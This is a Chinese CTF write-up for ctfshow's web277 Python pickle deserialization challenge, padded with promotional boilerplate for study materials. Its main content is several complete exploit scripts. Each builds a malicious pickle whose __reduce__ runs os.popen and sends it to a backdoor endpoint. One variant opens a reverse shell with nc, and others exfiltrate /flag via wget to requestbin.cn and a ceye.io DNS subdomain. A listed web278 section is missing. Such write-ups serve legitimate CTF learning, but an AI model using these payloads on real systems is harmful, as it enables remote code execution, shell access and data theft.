ctfshow python反序列化 刷题记录

最后

🍅 硬核资料：关注即可领取PPT模板、简历模板、行业经典书籍PDF。
🍅 技术互助：技术群大佬指点迷津，你的问题可能不是问题，求资源在群里喊一声。
🍅 面试题库：由技术群里的小伙伴们共同投稿，热乎的大厂面试真题，持续更新中。
🍅 知识体系：含编程语言、算法、大数据生态圈组件（Mysql、Hive、Spark、Flink）、数据仓库、Python、前端等等。

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友，可以戳这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

文章目录

• web277
• • 反弹 shell
    • dns 外带
    • • RequestBin
        • CEYE
        • DNSlog
• web278

web277

进入靶场会看到where is flag?，Ctrl+U 检查源代码后可以看到注释的 html 标签

<!--/backdoor?data= m=base64.b64decode(data) m=pickle.loads(m) -->

看到 pickle.loads 就知道是 python 反序列化没跑了。

先看给的提示：传入的 data 先进行 base64 解码后在进行反序列化，所以我们序列化完成之后还要额外进行 base64 编码

先简单的写一个爬虫脚本：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'ls /'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

params 的作用是将请求中的参数添加到 URL 中，以便将这些参数传递给服务器。在这种情况下，params 是一个字典，包含了要作为查询字符串添加到 URL 中的参数。最终的 URL 将包含这些参数，以便服务器可以根据这些参数来处理请求。

无论是ls /还是cat /flag，回显都是 backdoor here：说明是一道 ”无回显“ 的题目。

有两种方法：反弹 shell 和 的 dns 外带

反弹 shell

只需将脚本稍微改一下：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'nc vps-ip port -e /bin/sh'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://db665ec1-9a5b-4b46-a07e-045ad97ce824.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

然后先再 vps 上开启对应端口的监听在运行脚本（否则会报错）

以1234端口为例：

nc -lvnp 1234

运行脚本后则会显示：

此时就可以输入 Linux 命令来读取 flag 啦

dns 外带

RequestBin

网址：RequestBin — Collect, inspect and debug HTTP requests and webhooks

先点击 Create a RequestBin 获取一个 url

同样只需将脚本稍微改一下：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'wget http://requestbin.cn:80/1cpartx1?a=`cat /flag`'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)

wget是一个在命令行下使用的下载工具，它可以从指定的URL下载文件。

运行脚本就能得到 flag

CEYE

网址：CEYE - Monitor service for security testing

可以稍微参考一下这篇文章：RCE绕过之无回显-优快云博客，也可以在 http://ceye.io/payloads 中找相对应的 payload

在 http://ceye.io/profile 下的 Identifier 可以获取对应 url

同样只需将脚本稍微改一下：

import os
import pickle
import base64
import requests

class exp(object):
    def \_\_reduce\_\_(self):
        payload = 'wget `cat /flag`.zrne70.ceye.io'
        return (os.popen,(payload,))

a=exp()
b=pickle.dumps(a)
c=base64.b64encode(b)

url="http://6ebe56d4-210d-4cbe-836f-078deeb4a9d0.challenge.ctf.show/backdoor"
params={'data':c}

r=requests.get(url=url,params=params)
print(r.text)


![在这里插入图片描述](https://img-blog.csdnimg.cn/20210511152217670.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3poaWd1aWd1,size_16,color_FFFFFF,t_70)

**感谢每一个认真阅读我文章的人，看着粉丝一路的上涨和关注，礼尚往来总是要有的：**



①　2000多本Python电子书（主流和经典的书籍应该都有了）

②　Python标准库资料（最全中文版）

③　项目源码（四五十个有趣且经典的练手项目及源码）

④　Python基础入门、爬虫、web开发、大数据分析方面的视频（适合小白学习）

⑤ Python学习路线图（告别不入流的学习）




**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化学习资料的朋友，可以戳这里获取](https://bbs.youkuaiyun.com/topics/618317507)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**